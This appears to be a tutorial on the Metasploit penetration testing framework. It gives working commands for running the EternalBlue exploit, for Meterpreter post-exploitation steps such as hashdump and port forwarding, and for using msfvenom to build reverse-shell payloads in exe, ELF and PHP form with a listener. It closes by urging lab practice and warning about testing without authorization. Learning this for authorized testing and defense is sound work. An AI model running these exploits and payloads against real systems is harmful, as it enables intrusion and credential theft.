Metasploit is the most widely used penetration testing framework. Understanding how it works — not just what commands to type — makes the difference between running modules blindly and understanding what’s actually happening on the target system.
What Metasploit Is
Metasploit is a framework for developing, testing, and executing exploits against target systems. It provides:
- A database of exploit modules for known vulnerabilities
- Payload generation and delivery infrastructure
- Post-exploitation modules for privilege escalation, lateral movement, and data collection
- A consistent interface across all of these capabilities
The key thing to understand: Metasploit doesn’t find vulnerabilities for you. It provides a framework for exploiting vulnerabilities you’ve already identified. The reconnaissance work — finding what services are running, what versions, what CVEs apply — happens before Metasploit comes into the workflow.
Core Concepts
Exploit module: The code that triggers the vulnerability on the target system.
Payload: The code that executes on the target after the exploit succeeds. The most common is Meterpreter — an in-memory payload that provides an interactive session with a rich set of post-exploitation commands.
RHOST / LHOST: Remote host (the target) and local host (your machine). These are the two most critical options in any module. Getting these wrong produces a failure; getting LHOST wrong while exploiting a real system can expose your machine.
Sessions: When an exploit succeeds and a payload connects back, it creates a session. The sessions command lists them; sessions -i N interacts with session N.
Basic Workflow
# Start the console
msfconsole
# Search for modules related to a specific vulnerability or service
search eternalblue
search type:exploit platform:windows smb
# Load a module
use exploit/windows/smb/ms17_010_eternalblue
# Show required options
show options
# Set target and payload
set RHOSTS 192.168.1.X
set LHOST 192.168.1.Y
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Verify and run
check # tests if target is vulnerable (not available on all modules)
run
Meterpreter Post-Exploitation
Once you have a Meterpreter session, common commands:
# System info
sysinfo
getuid # current user context
getpid # current process ID
# Privilege escalation
getsystem # attempt automatic privilege escalation
hashdump # dump password hashes (requires SYSTEM)
# File system
ls
download /path/to/file /local/path
upload /local/file /remote/path
# Network
ipconfig
arp # ARP cache - reveals other hosts on the network
portfwd add -l 4444 -p 3389 -r 192.168.X.X # port forward
# Persistence and pivoting
run post/multi/recon/local_exploit_suggester # suggest local privilege escalation paths
background # background the session, return to console
Payload Types
The naming convention tells you what the payload does:
windows/x64/meterpreter/reverse_tcp — Windows x64, Meterpreter, connects back to you over TCP.
Staged vs stageless: windows/meterpreter/reverse_tcp is staged — a small stager runs first, then downloads the full payload. windows/meterpreter_reverse_tcp (underscore) is stageless — the full payload is delivered at once. Stageless is larger but more reliable when you don’t control the network conditions between stages.
Shell vs Meterpreter: A shell payload gives you a command prompt. Meterpreter gives you a richer interactive session that runs in memory and is harder to detect. Prefer Meterpreter when available.
Generating Standalone Payloads with msfvenom
# Generate a Windows executable payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.Y LPORT=4444 -f exe -o payload.exe
# Generate for other formats
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.Y LPORT=4444 -f elf -o payload
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.Y LPORT=4444 -f raw > shell.php
Set up a listener to catch the callback:
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.Y
set LPORT 4444
run
Lab Environment
Before using Metasploit against anything, set up a lab. Metasploitable2 and Metasploitable3 are intentionally vulnerable VMs designed for this. Vulnhub and HackTheBox provide additional targets.
Running Metasploit against systems you don’t own and don’t have written authorization to test is a federal crime in the US under the CFAA. The lab environment isn’t optional — it’s how you build skills without committing crimes.